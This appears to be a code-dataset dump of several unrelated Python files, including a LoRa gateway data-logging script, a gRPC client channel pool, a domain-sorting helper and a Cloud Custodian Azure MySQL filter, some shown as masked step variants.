\n\t\t\t\t\t\t\"time\" : now,\n\t\t\t\t\t\t\"data\" : json.dumps(json.loads(str_json_data))\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t#adding the document\n\t\t\t\t\tadd_document(doc)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving done\")\n\t\t\t\t\n\t\t\t\tsensor_entry='sensor%d'% (src)\n\t\t\t\tmsg_entry='msg%d' % (seq)\t\n\t\t\t\t\n\t\t\t\t#upload data to firebase\n\t\t\t\tfirebase_uploadSingleData(firebase_msg, sensor_entry, msg_entry, now)\n\t\t\t\t\n\t\t\telif (ch=='!'): #log on thingspeak, grovestreams, sensorcloud and connectingnature\n\t\n\t\t\t\tldata = getAllLine()\n\t\t\t\t\n\t\t\t\t# get number of '#' separator\n\t\t\t\tnsharp = ldata.count('#')\t\t\t\n\t\t\t\t#no separator\n\t\t\t\tif nsharp==0:\n\t\t\t\t\t#will use default channel and field\n\t\t\t\t\tdata=['','']\n\t\t\t\t\t\n\t\t\t\t\t#contains ['', '', \"s1\", s1value, \"s2\", s2value, ...]\n\t\t\t\t\tdata_array = data + re.split(\"/\", ldata)\t\t\n\t\t\t\telif nsharp==1:\n\t\t\t\t\t#only 1 separator\n\t\t\t\t\t\n\t\t\t\t\tdata_array = re.split(\"#|/\", ldata)\n\t\t\t\t\t\n\t\t\t\t\t#if the first item has length > 1 then we assume that it is a channel write key\n\t\t\t\t\tif len(data_array[0])>1:\n\t\t\t\t\t\t#insert '' to indicate default field\n\t\t\t\t\t\tdata_array.insert(1,'');\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\t#insert '' to indicate default channel\n\t\t\t\t\t\tdata_array.insert(0,'');\t\t\n\t\t\t\telse:\n\t\t\t\t\t#contains [channel, field, \"s1\", s1value, \"s2\", s2value, ...]\n\t\t\t\t\tdata_array = re.split(\"#|/\", ldata)\t\n\t\t\t\t\t\n\t\t\t\t#just in case we have an ending CR or 0\n\t\t\t\tdata_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\\n', '')\n\t\t\t\tdata_array[len(data_array)-1] = data_array[len(data_array)-1].replace('\\0', '')\t\n\t\t\t\t\n\t\t\t\t#test if there are characters at the end of each value, then delete these characters\n\t\t\t\ti = 3\n\t\t\t\twhile i < len(data_array) :\n\t\t\t\t\twhile not data_array[i][len(data_array[i])-1].isdigit() :\n\t\t\t\t\t\tdata_array[i] = data_array[i][:-1]\n\t\t\t\t\ti += 2\n\t\t\t\t\n\t\t\t\tif _mongodb :\t\n\t\t\t\t\t#------------------\n\t\t\t\t\t#saving in MongoDB\n\t\t\t\t\t#------------------\n\t\t\t\t\n\t\t\t\t\t#check if new month\n\t\t\t\t\tremove_if_new_month(now)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving the document in the collection...\")\n\t\t\t\t\t\n\t\t\t\t\t#saving data in a JSON var\n\t\t\t\t\tstr_json_data = \"{\"\n\t\t\t\t\t#start from the first nomenclature\n\t\t\t\t\titeration = 2\n\t\t\t\t\twhile iteration < len(data_array)-1 :\n\t\t\t\t\t\t#last iteration, do not add \",\" at the end\n\t\t\t\t\t\tif iteration == len(data_array)-2 :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+data_array[iteration]+\"\\\" : \"+data_array[iteration+1]\n\t\t\t\t\t\telse :\n\t\t\t\t\t\t\tstr_json_data += \"\\\"\"+data_array[iteration]+\"\\\" : \"+data_array[iteration+1]+\", \"\n\t\t\t\t\t\titeration += 2\n\t\t\t\t\tstr_json_data += \"}\"\n\t\t\t\t\n\t\t\t\t\t#creating document to add\n\t\t\t\t\tdoc = {\n\t\t\t\t\t\t\"type\" : ptypestr,\n\t\t\t\t\t\t\"gateway_eui\" : _gwaddr, \n\t\t\t\t\t\t\"node_eui\" : src,\n\t\t\t\t\t\t\"snr\" : SNR, \n\t\t\t\t\t\t\"rssi\" : RSSI, \n\t\t\t\t\t\t\"cr\" : cr, \n\t\t\t\t\t\t\"datarate\" : \"SF\"+str(sf)+\"BW\"+str(bw),\n\t\t\t\t\t\t\"time\" : now,\n\t\t\t\t\t\t\"data\" : json.dumps(json.loads(str_json_data))\n\t\t\t\t\t}\n\t\t\t\t\n\t\t\t\t\t#adding the document\n\t\t\t\t\tadd_document(doc)\n\t\t\t\t\n\t\t\t\t\tprint(\"MongoDB: saving done\")\n\n\t\t\t\t# get number of '/' separator\n\t\t\t\tnslash = ldata.count('/')\n\t\t\t\t\n\t\t\t\tindex_first_data = 2\n\t\t\t\t\n\t\t\t\tif nslash==0:\n\t\t\t\t\t# old syntax without nomenclature key\n\t\t\t\t\tindex_first_data=2\n\t\t\t\telse:\n\t\t\t\t\t# new syntax with nomenclature key\t\t\t\t\n\t\t\t\t\tindex_first_data=3\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t#------------------\n\t\t\t\t#test for thingspeak\n\t\t\t\t#------------------\t\t\t\t \n\t\t\t\tif (_thingspeak):\n\t\t\t\t\t\t\n\t\t\t\t\tsecond_data=str(seq)\n\t\t\t\t\n\t\t\t\t\tif (_thingspeaksnr):\n\t\t\t\t\t\tsecond_data=str(SNR)\n\t\t\t\t\t\n\t\t\t\t\t#data to send to thingspeak\n\t\t\t\t\tdata = []\n\t\t\t\t\tdata.append(data_array[0]) #channel (if '' default)\n\t\t\t\t\tdata.append(data_array[1]) #field (if '' default)\t\t\n\t\t\t\t\t\n\t\t\t\t\tdata.append(data_array[index_first_data]) #value to add (the first sensor value in data_array)\n\t\t\t\t\t\n\t\t\t\t\t#upload data to thingspeak\n\t\t\t\t\t#JUST FOR UPLOAD A SINGLE DATA IN A SPECIFIC FIELD AND SECOND DATA\t\t\t\t\t\n\t\t\t\t\tthingspeak_uploadSingleData(data, second_data) \n\n\t\t\t\t\t# if you want to upload all data starting at field 1, uncomment next line, and comment previous line\n\t\t\t\t\t#thingspeak_uploadMultipleData(data_array) # upload all data in the fields\n\t\t\t\n\t\t\t\t#------------------\n\t\t\t\t#test for FIWARE \n\t\t\t\t#need FIWARE access\n\t\t\t\t#------------------\t\t\t\t \n\t\t\t\tif (_fiware):\n\t\t\t\t\tprint(\"FIWARE: upload\")\n\t\t\t\t\t#entity_id = 'test_item_'+now.isoformat()\n\t\t\t\t\tentity_id = 'sensor%d'% (src)\n\t\t\t\t\t#send the first sensor value in data_array\n\t\t\t\t\tcmd = 'python ./fiware_UpdateEntityAttribute.py '+entity_id+' test temperature float '+data_array[index_first_data]\n\t\t\t\t\n\t\t\t\t\tprint(\"FiWare: will issue python script\")\n\t\t\t\t\tprint(cmd)\n\t\t\t\t\targs = cmd.split()\n\t\t\t\t\ttry:\n\t\t\t\t\t\tout = subprocess.check_output(args, shell=False)\n\t\t\t\t\texcept subprocess.CalledProcessError:\n\t\t\t\t\t\tprint(\"FiWare: python script failed\")\n\t \t\t\t\n\t\t\t\t\tif out.find('\"reasonPhrase\" : \"OK\"') > 0:\n\t\t\t\t\t\tprint(\"FiWare: Entity updated with ENTITY_ID \"+entity_id)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"FiWare: Entity update failed\")\n\n\t\t\t\t#------------------\n\t\t\t\t#test for sensorcloud \n\t\t\t\t#------------------\n\t\t\t\tif (_sensorcloud) :\n\t\t\t\t\t#send the first sensor value in data_array\n\t\t\t\t\tsensorcloud_uploadSingleData(data_array[index_first_data])\n\n\t\t\t\t#------------------\n\t\t\t\t#test for grovestreams \n\t\t\t\t#------------------\t\t\t\t \n\t\t\t\tif (_grovestreams):\n\t\t\t\t\n\t\t\t\t\tnomenclatures = []\n\t\t\t\t\tdata = []\n\t\t\t\t\t\n\t\t\t\t\tif nslash==0:\n\t\t\t\t\t\t# old syntax without nomemclature key, so insert only one key\n\t\t\t\t\t\tnomenclatures.append(\"temp\")\n\t\t\t\t\t\tdata.append(data_array[index_first_data])\n\t\t\t\t\telse:\n\t\t\t\t\t\t#completing nomenclatures and data\n\t\t\t\t\t\ti=2\n\t\t\t\t\t\twhile i < len(data_array)-1 :\n\t\t\t\t\t\t\tnomenclatures.append(data_array[i])\n\t\t\t\t\t\t\tdata.append(data_array[i+1])\n\t\t\t\t\t\t\ti += 2\n\t\t\t\t\t\n\t\t\t\t\t#upload data to grovestreams\n\t\t\t\t\tgrovestreams_uploadSingleData(nomenclatures, data, str(src))\n\t\t\t\t\t\n\n\t\t\t# END\n\t\t\t#////////////////////////////////////////////////////////////\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\telse: # not a known data logging prefix\n\t\t\t\t#you may want to upload to a default service\n\t\t\t\t#so just implement it here\n\t\t\t\tprint('unrecognized data logging prefix: discard data')\n\t\t\t\tgetAllLine() \n\t\t\t\t\t\n\t\telse:\n\t\t\tprint('invalid app key: discard data')\n\t\t\tgetAllLine()\n\n\t\tcontinue\n\t\n\t# handle binary prefixes\n\tif (ch == '\\xFF' or ch == '+'):\n\t#if (ch == '\\xFF'):\n\t\n\t\tprint(\"got first framing byte\")\n\t\tch=getSingleChar()\t\n\t\t\n\t\t# data prefix for non-encrypted data\n\t\tif (ch == '\\xFE' or ch == '+'):\t\t\t\n\t\t#if (ch == '\\xFE'):\n\t\t\t#the data prefix is inserted by the gateway\n\t\t\t#do not modify, unless you know what you are doing and that you modify lora_gateway (comment WITH_DATA_PREFIX)\n\t\t\tprint(\"--> got data prefix\")\n\t\t\t\n\t\t\t#we actually need to use DATA_PREFIX in order to differentiate data from radio coming to the post-processing stage\n\t\t\t#if _wappkey is set then we have to first indicate that _validappkey=0\n\t\t\tif (_wappkey==1):\n\t\t\t\t_validappkey=0\n\t\t\telse:\n\t\t\t\t_validappkey=1\t\n\n\t\t\t# if we have raw output from gw, then try to determine which kind of packet it is\n\t\t\tif (_rawFormat==1):\n\t\t\t\tch=getSingleChar()\n\t\t\t\t\n\t\t\t\t# probably our modified Libelium header where the destination is the gateway\n\t\t\t\t# dissect our modified Libelium format\n\t\t\t\tif ch==1:\t\t\t\n\t\t\t\t\tdst=ord(ch)\n\t\t\t\t\tptype=ord(getSingleChar())\n\t\t\t\t\tsrc=ord(getSingleChar())\n\t\t\t\t\tseq=ord(getSingleChar())\n\t\t\t\t\tprint(\"Libelium[dst=%d ptype=0x%.2X src=%d seq=%d]\" % (dst,ptype,src,seq))\n\t\t\t\t\t# now we read datalen-4 (the header length) bytes in our line buffer\n\t\t\t\t\tfillLinebuf(datalen-HEADER_SIZE)\t\t\t\t\n\t\t\t\t\n\t\t\t\t# TODO: dissect LoRaWAN\n\t\t\t\t# you can implement LoRaWAN decoding if this is necessary for your system\n\t\t\t\t# look at the LoRaWAN packet format specification to dissect the packet in detail\n\t\t\t\t# \n\t\t\t\t# LoRaWAN uses the MHDR(1B)\n\t\t\t\t# ----------------------------\n\t\t\t\t# | 7 6 5 | 4 3 2 | 1 0 |\n\t\t\t\t# ----------------------------\n\t\t\t\t# MType RFU major\n\t\t\t\t#\n\t\t\t\t# the main MType is unconfirmed data up which value is 010\n\t\t\t\tif (ch & 0x40)==0x40:\n\t\t\t\t\t# Do the LoRaWAN decoding\n\t\t\t\t\tprint(\"LoRaWAN?\")\n\t\t\t\t\t# for the moment just discard the data\n\t\t\t\t\tfillLinebuf(datalen-1)\n\t\t\t\t\tgetAllLine()\n\t\t\telse:\t\t\t\t\t\t\t\t\n\t\t\t\t# now we read datalen bytes in our line buffer\n\t\t\t\tfillLinebuf(datalen)\t\t\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t# encrypted data payload?\n\t\t\tif ((ptype & PKT_FLAG_DATA_ENCRYPTED)==PKT_FLAG_DATA_ENCRYPTED):\n\t\t\t\tprint(\"--> DATA encrypted: encrypted payload size is %d\" % datalen)\n\t\t\t\t\n\t\t\t\t_hasClearData=0\n\t\t\t\t\n\t\t\t\tif _aes==1:\n\t\t\t\t\tprint(\"--> decrypting\")\n\t\t\t\t\t\n\t\t\t\t\tdecrypt_handler = AES.new(aes_key, AES.MODE_CBC, aes_iv)\n\t\t\t\t\t# decrypt \n\t\t\t\t\ts = decrypt_handler.decrypt(_linebuf)\n\t\t\t\t\t\n\t\t\t\t\tfor i in range(0, len(s)):\n\t\t\t\t\t\tprint \"%.2X \" % ord(s[i]),\n\t\t\t\t\t\n\t\t\t\t\tprint \"\\nEnd\"\n\t\t\t\t\t\t\n\t\t\t\t\t# get the real (decrypted) payload size\n\t\t\t\t\trsize = ord(s[APPKEY_SIZE])\n\t\t\t\t\t\n\t\t\t\t\tprint(\"--> real payload size is %d\" % rsize)\n\t\t\t\t\t\n\t\t\t\t\t# then add the appkey + the appkey framing bytes\n\t\t\t\t\trsize = rsize+APPKEY_SIZE+1\n\t\t\t\t\t\n\t\t\t\t\t_linebuf = s[:APPKEY_SIZE] + s[APPKEY_SIZE+1:rsize]\n\t\t\t\t\t\n\t\t\t\t\tfor i in range(0, len(_linebuf)):\n\t\t\t\t\t\tprint \"%.2X \" % ord(_linebuf[i]),\n\t\t\t\t\t\n\t\t\t\t\tprint \"\\nEnd\"\n\t\t\t\t\t\t\n\t\t\t\t\t# normally next read from input will get data from the decrypted _linebuf\n\t\t\t\t\tprint \"--> decrypted payload is: \",\n\t\t\t\t\tprint _linebuf[APPKEY_SIZE:]\n\t\t\t\t\t\n\t\t\t\t\t_hasClearData=1\n\t\t\t\telse:\n\t\t\t\t\tprint(\"--> DATA encrypted: aes not activated\")\n\t\t\t\t\t# drain stdin of all the encrypted data\n\t\t\t\t\tenc_data=getAllLine()\n\t\t\t\t\tprint(\"--> discard encrypted data\")\n\t\t\telse:\n\t\t\t\t_hasClearData=1\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t# with_appkey?\n\t\t\tif ((ptype & PKT_FLAG_DATA_WAPPKEY)==PKT_FLAG_DATA_WAPPKEY and _hasClearData==1): \n\t\t\t\tprint(\"--> DATA with_appkey: read app key sequence\")\n\t\t\t\t\n\t\t\t\tthe_app_key = getSingleChar()\n\t\t\t\tthe_app_key = the_app_key + getSingleChar()\n\t\t\t\tthe_app_key = the_app_key + getSingleChar()\n\t\t\t\tthe_app_key = the_app_key + getSingleChar()\n\t\t\t\t\n\t\t\t\tprint \"app key is \",\n\t\t\t\tprint \" \".join(\"0x{:02x}\".format(ord(c)) for c in the_app_key)\n\t\t\t\t\n\t\t\t\tif the_app_key in app_key_list:\n\t\t\t\t\tprint(\"in app key list\")\n\t\t\t\t\tif _wappkey==1:\n\t\t\t\t\t\t_validappkey=1\n\t\t\t\telse:\t\t\n\t\t\t\t\tprint(\"not in app key list\")\n\t\t\t\t\tif _wappkey==1:\n\t\t\t\t\t\t_validappkey=0\n\t\t\t\t\telse:\t\n\t\t\t\t\t\t#we do not check for app key\n\t\t\t\t\t\t_validappkey=1\n\t\t\t\t\t\tprint(\"but app key disabled\")\t\t\t\t\n\t\t\t\t\n\t\t\tcontinue\n\t\t\t\n\tif (ch == '?' and _ignoreComment==1):\n\t\tsys.stdin.readline()\n\t\tcontinue\n\t\n\tsys.stdout.write(ch)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
def play_43():
n=int(input('Enter n :'))
l=[]
for i in range(n):
l.append(int(input()))
for i in range(n-1):
for j in range(i+1,n):
if l[i]<l[j]:
continue
return "no"
return "Yes"
play_43()
|
normal
|
{
"blob_id": "1605396a6edb31dd6fe9238a0506f8cfeb794d07",
"index": 5568,
"step-1": "<mask token>\n",
"step-2": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\n<mask token>\n",
"step-3": "def play_43():\n n = int(input('Enter n :'))\n l = []\n for i in range(n):\n l.append(int(input()))\n for i in range(n - 1):\n for j in range(i + 1, n):\n if l[i] < l[j]:\n continue\n return 'no'\n return 'Yes'\n\n\nplay_43()\n",
"step-4": "def play_43():\n\tn=int(input('Enter n :'))\n\tl=[]\n\tfor i in range(n):\n\t\tl.append(int(input()))\n\tfor i in range(n-1):\n\t\tfor j in range(i+1,n):\n\t\t\tif l[i]<l[j]:\n\t\t\t\tcontinue\n\t\t\treturn \"no\"\n\treturn \"Yes\"\nplay_43()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import server_pb2
import atexit
from grpc.beta import implementations
from random import randint
from grpc._adapter._types import ConnectivityState
global _pool
_pool = dict()
class ChannelPool(object):
def __init__(self, host, port, pool_size):
self.host = host
self.port = port
self.pool_size = pool_size
self.channels = []
self.stubs = []
# only index, no ref!
# and this is a stub rank!
self.working_channel_indexs = set()
self.connect()
def flush_channels(self):
# call this method to check all the channels status
# if channel connection is failed or idle
# we could try to reconnect sometime
channels = [self.channels[i] for i in self.working_channel_indexs]
for channel in channels:
try:
state = channel._low_channel.check_connectivity_state(True)
if state == ConnectivityState.CONNECTING:
self.on_channel_connection(channel, state)
elif state == ConnectivityState.TRANSIENT_FAILURE:
self.on_transient_failure(channel, state)
elif state == ConnectivityState.FATAL_FAILURE:
self.on_fatal_failure(channel, state)
else:
self.on_success(channel, state)
except Exception, e:
self.on_exception(channel, state, e)
def on_channel_connection(self, channel, state):
pass
def on_transient_failure(self, channel, state):
pass
def on_fatal_failure(self, channel, state):
pass
def on_success(self, channel, state):
pass
def on_exception(self, channel, state, e):
pass
def connect(self):
for i in range(self.pool_size):
channel = implementations.insecure_channel(self.host, self.port)
stub = server_pb2.beta_create_SimpleService_stub(channel)
# we need to make channels[i] == stubs[i]->channel
self.channels.append(channel)
self.stubs.append(stub)
def shutdown(self):
for channel in self.channels:
del channel
del self.channels
for stub in self.stubs:
del stub
del self.stubs
self.channels = []
self.stubs = []
def get_stub(self):
index = randint(0, self.pool_size - 1)
self.working_channel_indexs.add(index)
return self.stubs[index]
def __del__(self):
self.shutdown()
class ClientImpl(object):
def __init__(self, host='0.0.0.0', port=50051, size=1):
self.pool = ChannelPool(host, port, size)
self.pool.connect()
self.register()
def register(self):
key = str(id(self))
value = self
if _pool.get(key):
old_obj = _pool.get(key)
del old_obj
_pool[key] = value
def shutdown(self):
self.pool.shutdown()
@property
def stub(self):
return self.pool.get_stub()
def hello(self, words, with_call=False):
request = server_pb2.HelloRequest(say=words)
return self.stub.Hello(request, 3, with_call=with_call)
Hello = hello
def get_client():
if _pool:
key = _pool.keys()[0]
return _pool[key]
client = ClientImpl()
return client
def exit_handler():
# this is a gRPC python bug
# so we need to end everything
# when app close
for _, obj in _pool.items():
obj.shutdown()
atexit.register(exit_handler)
|
normal
|
{
"blob_id": "aec45936bb07277360ea1a66b062edc4c282b45a",
"index": 4097,
"step-1": "import server_pb2\n\nimport atexit\n\nfrom grpc.beta import implementations\nfrom random import randint\nfrom grpc._adapter._types import ConnectivityState\n\nglobal _pool\n_pool = dict()\n\n\nclass ChannelPool(object):\n\n def __init__(self, host, port, pool_size):\n self.host = host\n self.port = port\n self.pool_size = pool_size\n self.channels = []\n self.stubs = []\n # only index, no ref!\n # and this is a stub rank!\n self.working_channel_indexs = set()\n self.connect()\n\n def flush_channels(self):\n # call this method to check all the channels status\n # if channel connection is failed or idle\n # we could try to reconnect sometime\n channels = [self.channels[i] for i in self.working_channel_indexs]\n for channel in channels:\n try:\n state = channel._low_channel.check_connectivity_state(True)\n if state == ConnectivityState.CONNECTING:\n self.on_channel_connection(channel, state)\n elif state == ConnectivityState.TRANSIENT_FAILURE:\n self.on_transient_failure(channel, state)\n elif state == ConnectivityState.FATAL_FAILURE:\n self.on_fatal_failure(channel, state)\n else:\n self.on_success(channel, state)\n except Exception, e:\n self.on_exception(channel, state, e)\n\n def on_channel_connection(self, channel, state):\n pass\n\n def on_transient_failure(self, channel, state):\n pass\n\n def on_fatal_failure(self, channel, state):\n pass\n\n def on_success(self, channel, state):\n pass\n\n def on_exception(self, channel, state, e):\n pass\n\n def connect(self):\n for i in range(self.pool_size):\n channel = implementations.insecure_channel(self.host, self.port)\n stub = server_pb2.beta_create_SimpleService_stub(channel)\n # we need to make channels[i] == stubs[i]->channel\n self.channels.append(channel)\n self.stubs.append(stub)\n\n def shutdown(self):\n for channel in self.channels:\n del channel\n del self.channels\n for stub in self.stubs:\n del stub\n del self.stubs\n self.channels = []\n self.stubs = []\n\n def get_stub(self):\n index = randint(0, self.pool_size - 1)\n self.working_channel_indexs.add(index)\n return self.stubs[index]\n\n def __del__(self):\n self.shutdown()\n\n\nclass ClientImpl(object):\n def __init__(self, host='0.0.0.0', port=50051, size=1):\n self.pool = ChannelPool(host, port, size)\n self.pool.connect()\n self.register()\n\n def register(self):\n key = str(id(self))\n value = self\n if _pool.get(key):\n old_obj = _pool.get(key)\n del old_obj\n _pool[key] = value\n\n def shutdown(self):\n self.pool.shutdown()\n\n @property\n def stub(self):\n return self.pool.get_stub()\n\n def hello(self, words, with_call=False):\n request = server_pb2.HelloRequest(say=words)\n return self.stub.Hello(request, 3, with_call=with_call)\n\n Hello = hello\n\n\ndef get_client():\n if _pool:\n key = _pool.keys()[0]\n return _pool[key]\n client = ClientImpl()\n return client\n\n\ndef exit_handler():\n # this is a gRPC python bug\n # so we need to end everything\n # when app close\n for _, obj in _pool.items():\n obj.shutdown()\n\natexit.register(exit_handler)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = '(.*\\.)?(.*\\.)(.*)'
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
domain_values = domain_search.group(2), domain_search.group(3
), domain_search.group(1)
key = '%s%s%s' % domain_values
else:
key = domain
return key
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = '(.*\\.)?(.*\\.)(.*)'
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
domain_values = domain_search.group(2), domain_search.group(3
), domain_search.group(1)
key = '%s%s%s' % domain_values
else:
key = domain
return key
<|reserved_special_token_0|>
print('before: %s' % domains.__repr__())
domains.sort(key=domain_sort_key)
print('after: %s' % domains.__repr__())
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = '(.*\\.)?(.*\\.)(.*)'
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
domain_values = domain_search.group(2), domain_search.group(3
), domain_search.group(1)
key = '%s%s%s' % domain_values
else:
key = domain
return key
domains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']
print('before: %s' % domains.__repr__())
domains.sort(key=domain_sort_key)
print('after: %s' % domains.__repr__())
<|reserved_special_token_1|>
def domain_sort_key(domain):
"""Key to sort hosts / domains alphabetically, by domain name."""
import re
domain_expr = r'(.*\.)?(.*\.)(.*)' # Eg: (www.)(google.)(com)
domain_search = re.search(domain_expr, domain)
if domain_search and domain_search.group(1):
# sort by domain name and then everything left of
# Eg: google, com, www
domain_values = (
domain_search.group(2),
domain_search.group(3),
domain_search.group(1)
)
key = '%s%s%s' % domain_values
else:
# no host portion, just return the domain name
key = domain
return(key)
domains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']
print('before: %s' % domains.__repr__())
domains.sort(key=domain_sort_key)
print('after: %s' % domains.__repr__())
|
flexible
|
{
"blob_id": "c581d9714681e22c75b1eeb866ea300e87b883f1",
"index": 2972,
"step-1": "<mask token>\n",
"step-2": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = '(.*\\\\.)?(.*\\\\.)(.*)'\n domain_search = re.search(domain_expr, domain)\n if domain_search and domain_search.group(1):\n domain_values = domain_search.group(2), domain_search.group(3\n ), domain_search.group(1)\n key = '%s%s%s' % domain_values\n else:\n key = domain\n return key\n\n\n<mask token>\n",
"step-3": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = '(.*\\\\.)?(.*\\\\.)(.*)'\n domain_search = re.search(domain_expr, domain)\n if domain_search and domain_search.group(1):\n domain_values = domain_search.group(2), domain_search.group(3\n ), domain_search.group(1)\n key = '%s%s%s' % domain_values\n else:\n key = domain\n return key\n\n\n<mask token>\nprint('before: %s' % domains.__repr__())\ndomains.sort(key=domain_sort_key)\nprint('after: %s' % domains.__repr__())\n",
"step-4": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = '(.*\\\\.)?(.*\\\\.)(.*)'\n domain_search = re.search(domain_expr, domain)\n if domain_search and domain_search.group(1):\n domain_values = domain_search.group(2), domain_search.group(3\n ), domain_search.group(1)\n key = '%s%s%s' % domain_values\n else:\n key = domain\n return key\n\n\ndomains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']\nprint('before: %s' % domains.__repr__())\ndomains.sort(key=domain_sort_key)\nprint('after: %s' % domains.__repr__())\n",
"step-5": "def domain_sort_key(domain):\n \"\"\"Key to sort hosts / domains alphabetically, by domain name.\"\"\"\n import re\n domain_expr = r'(.*\\.)?(.*\\.)(.*)' # Eg: (www.)(google.)(com)\n domain_search = re.search(domain_expr, domain)\n\n if domain_search and domain_search.group(1):\n # sort by domain name and then everything left of\n # Eg: google, com, www\n domain_values = (\n domain_search.group(2),\n domain_search.group(3),\n domain_search.group(1)\n )\n key = '%s%s%s' % domain_values\n else:\n # no host portion, just return the domain name\n key = domain\n return(key)\n\n\ndomains = ['www.google.com', 'cnn.com', 'mail.google.com', 'www.bing.com']\nprint('before: %s' % domains.__repr__())\ndomains.sort(key=domain_sort_key)\nprint('after: %s' % domains.__repr__())\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
<|reserved_special_token_0|>
schema = type_schema('server-parameter', required=['type', 'name'],
rinherit=ValueFilter.schema, name={'type': 'string',
'allowed_value': ['TLSv1.2']})
def __call__(self, resource):
key = f"c7n:config-params:{self.data['name']}"
if key not in resource['properties']:
client = self.manager.get_client()
query = client.configurations.get(resource['resourceGroup'],
resource['name'], self.data['name'])
resource['properties'][key] = query.serialize(True).get(
'properties')
return super().__call__(resource['properties'].get(key))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
"""Filter by configuration parameter for mysql flexible server
:example:
Example JSON document showing the data format provided to the filter
.. code-block:: json
{
"value": "TLSv1.2"
"description": "Which protocols the server permits for encrypted
connections. By default, TLS 1.2 is enforced",
"defaultValue": "TLSv1.2",
"dataType": "Set",
"allowedValues": "TLSv1,TLSv1.1,TLSv1.2",
"source": "system-default",
"isReadOnly": "False",
"isConfigPendingRestart": "False",
"isDynamicConfig": "False",
}
:example:
Find Mysql Flexible servers with tls_version not set to TLSV1.2
.. code-block:: yaml
policies:
- name: mysql-flexible-server-tls-version
resource: azure.mysql-flexibleserver
filters:
- type: server-parameter
name: tls_version
key: value
op: eq
value: 'TLSv1.2'
"""
schema = type_schema('server-parameter', required=['type', 'name'],
rinherit=ValueFilter.schema, name={'type': 'string',
'allowed_value': ['TLSv1.2']})
def __call__(self, resource):
key = f"c7n:config-params:{self.data['name']}"
if key not in resource['properties']:
client = self.manager.get_client()
query = client.configurations.get(resource['resourceGroup'],
resource['name'], self.data['name'])
resource['properties'][key] = query.serialize(True).get(
'properties')
return super().__call__(resource['properties'].get(key))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@resources.register('mysql-flexibleserver')
class MySQLFlexibleServer(ArmResourceManager):
class resource_type(ArmResourceManager.resource_type):
doc_groups = ['Databases']
service = 'azure.mgmt.rdbms.mysql_flexibleservers'
client = 'MySQLManagementClient'
enum_spec = 'servers', 'list', None
default_report_fields = 'name', 'location', 'resourceGroup'
resource_type = 'Microsoft.DBForMySQL/flexibleservers/configurations'
@MySQLFlexibleServer.filter_registry.register('server-parameter')
class ServerParametersFilter(ValueFilter):
"""Filter by configuration parameter for mysql flexible server
:example:
Example JSON document showing the data format provided to the filter
.. code-block:: json
{
"value": "TLSv1.2"
"description": "Which protocols the server permits for encrypted
connections. By default, TLS 1.2 is enforced",
"defaultValue": "TLSv1.2",
"dataType": "Set",
"allowedValues": "TLSv1,TLSv1.1,TLSv1.2",
"source": "system-default",
"isReadOnly": "False",
"isConfigPendingRestart": "False",
"isDynamicConfig": "False",
}
:example:
Find Mysql Flexible servers with tls_version not set to TLSV1.2
.. code-block:: yaml
policies:
- name: mysql-flexible-server-tls-version
resource: azure.mysql-flexibleserver
filters:
- type: server-parameter
name: tls_version
key: value
op: eq
value: 'TLSv1.2'
"""
schema = type_schema('server-parameter', required=['type', 'name'],
rinherit=ValueFilter.schema, name={'type': 'string',
'allowed_value': ['TLSv1.2']})
def __call__(self, resource):
key = f"c7n:config-params:{self.data['name']}"
if key not in resource['properties']:
client = self.manager.get_client()
query = client.configurations.get(resource['resourceGroup'],
resource['name'], self.data['name'])
resource['properties'][key] = query.serialize(True).get(
'properties')
return super().__call__(resource['properties'].get(key))
<|reserved_special_token_1|>
from c7n_azure.provider import resources
from c7n_azure.resources.arm import ArmResourceManager
from c7n.utils import type_schema
from c7n.filters.core import ValueFilter
@resources.register('mysql-flexibleserver')
class MySQLFlexibleServer(ArmResourceManager):
